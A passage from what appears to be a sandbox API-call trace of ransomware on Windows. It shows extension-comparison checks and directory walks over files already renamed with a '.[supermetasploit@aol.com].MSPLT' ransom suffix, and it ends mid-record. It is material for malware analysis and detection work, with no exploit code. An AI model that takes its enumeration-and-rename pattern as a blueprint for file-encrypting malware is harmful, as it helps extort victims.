[0284.176] lstrlenW (lpString=".php5") returned 5 [0284.176] lstrcmpiW (lpString1=".php5", lpString2="MSPLT") returned -1 [0284.176] lstrlenW (lpString=".phtml") returned 6 [0284.176] lstrcmpiW (lpString1=".phtml", lpString2=".MSPLT") returned 1 [0284.176] lstrlenW (lpString=".pict") returned 5 [0284.176] lstrcmpiW (lpString1=".pict", lpString2="MSPLT") returned -1 [0284.176] lstrlenW (lpString=".pl") returned 3 [0284.176] lstrcmpiW (lpString1=".pl", lpString2="PLT") returned -1 [0284.177] lstrlenW (lpString=".pls") returned 4 [0284.177] lstrcmpiW (lpString1=".pls", lpString2="SPLT") returned -1 [0284.177] lstrlenW (lpString=".pm") returned 3 [0284.177] lstrcmpiW (lpString1=".pm", lpString2="PLT") returned -1 [0284.177] lstrlenW (lpString=".png") returned 4 [0284.177] lstrcmpiW (lpString1=".png", lpString2="SPLT") returned -1 [0284.177] lstrlenW (lpString=".pnm") returned 4 [0284.177] lstrcmpiW (lpString1=".pnm", lpString2="SPLT") returned -1 [0284.177] lstrlenW (lpString=".pot") returned 4 [0284.177] lstrcmpiW (lpString1=".pot", lpString2="SPLT") returned -1 [0284.177] lstrlenW (lpString=".potm") returned 5 [0284.177] lstrcmpiW (lpString1=".potm", lpString2="MSPLT") returned -1 [0284.177] lstrlenW (lpString=".potx") returned 5 [0284.177] lstrcmpiW (lpString1=".potx", lpString2="MSPLT") returned -1 [0284.177] lstrlenW (lpString=".ppa") returned 4 [0284.177] lstrcmpiW (lpString1=".ppa", lpString2="SPLT") returned -1 [0284.177] lstrlenW (lpString=".ppam") returned 5 [0284.177] lstrcmpiW (lpString1=".ppam", lpString2="MSPLT") returned -1 [0284.177] lstrlenW (lpString=".ppm") returned 4 [0284.177] lstrcmpiW (lpString1=".ppm", lpString2="SPLT") returned -1 [0284.177] lstrlenW (lpString=".pps") returned 4 [0284.177] lstrcmpiW (lpString1=".pps", lpString2="SPLT") returned -1 [0284.177] lstrlenW (lpString=".ppsm") returned 5 [0284.177] lstrcmpiW (lpString1=".ppsm", lpString2="MSPLT") returned -1 [0284.177] lstrlenW (lpString=".ppt") returned 4 [0284.177] lstrcmpiW (lpString1=".ppt", lpString2="SPLT") returned -1 [0284.177] lstrlenW (lpString=".pptm") returned 5 [0284.177] lstrcmpiW (lpString1=".pptm", lpString2="MSPLT") returned -1 [0284.177] lstrlenW (lpString=".pptx") returned 5 [0284.177] lstrcmpiW (lpString1=".pptx", lpString2="MSPLT") returned -1 [0284.177] lstrlenW (lpString=".prn") returned 4 [0284.178] lstrcmpiW (lpString1=".prn", lpString2="SPLT") returned -1 [0284.178] lstrlenW (lpString=".ps") returned 3 [0284.178] lstrcmpiW (lpString1=".ps", lpString2="PLT") returned -1 [0284.178] lstrlenW (lpString=".psb") returned 4 [0284.178] lstrcmpiW (lpString1=".psb", lpString2="SPLT") returned -1 [0284.178] lstrlenW (lpString=".psd") returned 4 [0284.178] lstrcmpiW (lpString1=".psd", lpString2="SPLT") returned -1 [0284.178] lstrlenW (lpString=".pst") returned 4 [0284.178] lstrcmpiW (lpString1=".pst", lpString2="SPLT") returned -1 [0284.178] lstrlenW (lpString=".ptx") returned 4 [0284.178] lstrcmpiW (lpString1=".ptx", lpString2="SPLT") returned -1 [0284.178] lstrlenW (lpString=".pub") returned 4 [0284.178] lstrcmpiW (lpString1=".pub", lpString2="SPLT") returned -1 [0284.178] lstrlenW (lpString=".pwm") returned 4 [0284.178] lstrcmpiW (lpString1=".pwm", lpString2="SPLT") returned -1 [0284.178] lstrlenW (lpString=".pxr") returned 4 [0284.178] lstrcmpiW (lpString1=".pxr", lpString2="SPLT") returned -1 [0284.178] lstrlenW (lpString=".py") returned 3 [0284.178] lstrcmpiW (lpString1=".py", lpString2="PLT") returned -1 [0284.178] lstrlenW (lpString=".qt") returned 3 [0284.178] lstrcmpiW (lpString1=".qt", lpString2="PLT") returned -1 [0284.178] lstrlenW (lpString=".r3d") returned 4 [0284.178] lstrcmpiW (lpString1=".r3d", lpString2="SPLT") returned -1 [0284.178] lstrlenW (lpString=".raf") returned 4 [0284.178] lstrcmpiW (lpString1=".raf", lpString2="SPLT") returned -1 [0284.178] lstrlenW (lpString=".rar") returned 4 [0284.178] lstrcmpiW (lpString1=".rar", lpString2="SPLT") returned -1 [0284.179] lstrlenW (lpString=".raw") returned 4 [0284.179] lstrcmpiW (lpString1=".raw", lpString2="SPLT") returned -1 [0284.179] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5bf1a8f6, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5bf1a8f6, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5bf1a8f6, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x13a76, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0284.179] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5be35a54, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5be35a54, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5be5bbc3, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0284.179] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5be35a54, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5be35a54, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5be5bbc3, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0284.179] FindClose (in: hFindFile=0x3947d28 | out: hFindFile=0x3947d28) returned 1 [0284.180] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0284.180] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="3076", cAlternateFileName="")) returned 1 [0284.180] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0284.180] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\3076\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName=".", cAlternateFileName="")) returned 0x3948268 [0284.183] FindNextFileW (in: hFindFile=0x3948268, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="..", cAlternateFileName="")) returned 1 [0284.183] FindNextFileW (in: hFindFile=0x3948268, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5bfd9334, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5bfd9334, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5bfff512, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x1994, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0284.183] FindNextFileW (in: hFindFile=0x3948268, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5bfff512, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5bfff512, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5bfff512, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xee96, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0284.183] FindNextFileW (in: hFindFile=0x3948268, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5be8807a, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5be8807a, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c029b40, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x3858, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0284.184] FindNextFileW (in: hFindFile=0x3948268, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5be8807a, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5be8807a, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c029b40, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x3858, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0284.184] FindClose (in: hFindFile=0x3948268 | out: hFindFile=0x3948268) returned 1 [0284.185] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0284.185] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="3082", cAlternateFileName="")) returned 1 [0284.185] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0284.185] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\3082\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName=".", cAlternateFileName="")) returned 0x3947d68 [0284.188] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="..", cAlternateFileName="")) returned 1 [0284.188] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c097f88, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c097f88, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c0be232, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xce4, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0284.188] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c0be232, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c0be232, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c0be232, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x13976, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0284.188] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5bea7fff, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5bea7fff, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5bece217, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0284.188] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5bea7fff, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5bea7fff, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5bece217, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0284.188] FindClose (in: hFindFile=0x3947d68 | out: hFindFile=0x3947d68) returned 1 [0284.189] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0284.189] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Client", cAlternateFileName="")) returned 1 [0284.190] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0284.190] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Client\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName=".", cAlternateFileName="")) returned 0x3948068 [0284.194] FindNextFileW (in: hFindFile=0x3948068, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="..", cAlternateFileName="")) returned 1 [0284.194] FindNextFileW (in: hFindFile=0x3948068, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c0e434b, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c0e434b, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c17ce12, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x31546, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="Parameterinfo.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="PARAME~1.MSP")) returned 1 [0284.194] FindNextFileW (in: hFindFile=0x3948068, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c40929b, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c40929b, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c4a1cc4, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x9978, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="UiInfo.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="UIINFO~1.MSP")) returned 1 [0284.194] FindNextFileW (in: hFindFile=0x3948068, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c40929b, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c40929b, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c4a1cc4, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x9978, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="UiInfo.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="UIINFO~1.MSP")) returned 0 [0284.194] FindClose (in: hFindFile=0x3948068 | out: hFindFile=0x3948068) returned 1 [0284.195] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0284.195] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c2fa478, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c2fa478, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c3432af, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x3ff4, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="DHtmlHeader.html.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="DHTMLH~1.MSP")) returned 1 [0284.196] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5bf8cf21, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5bf8cf21, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5bf8cf21, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x15ad2, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="DisplayIcon.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="DISPLA~1.MSP")) returned 1 [0284.196] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Extended", cAlternateFileName="")) returned 1 [0284.196] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0284.196] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Extended\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName=".", cAlternateFileName="")) returned 0x3947de8 [0284.339] FindNextFileW (in: hFindFile=0x3947de8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="..", cAlternateFileName="")) returned 1 [0284.340] FindNextFileW (in: hFindFile=0x3947de8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c40929b, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c40929b, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c42f540, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x16d86, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="Parameterinfo.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="PARAME~1.MSP")) returned 1 [0284.340] FindNextFileW (in: hFindFile=0x3947de8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c40929b, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c40929b, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c45db08, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x9978, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="UiInfo.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="UIINFO~1.MSP")) returned 1 [0284.340] FindNextFileW (in: hFindFile=0x3947de8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c40929b, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c40929b, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c45db08, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x9978, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="UiInfo.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="UIINFO~1.MSP")) returned 0 [0284.342] FindClose (in: hFindFile=0x3947de8 | out: hFindFile=0x3947de8) returned 1 [0284.345] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0284.347] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Graphics", cAlternateFileName="")) returned 1 [0284.347] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics") returned 30 [0284.347] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\588bce7c90097ed212\\Graphics") returned 1 [0284.347] lstrlenW (lpString="Graphics") returned 8 [0284.348] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="Graphics") returned -1 [0284.349] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0284.349] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics") returned 30 [0284.349] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName=".", cAlternateFileName="")) returned 0x3948168 [0284.355] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="..", cAlternateFileName="")) returned 1 [0284.356] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c47baec, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c47baec, ftLastAccessTime.dwHighDateTime=0x1d6097d, 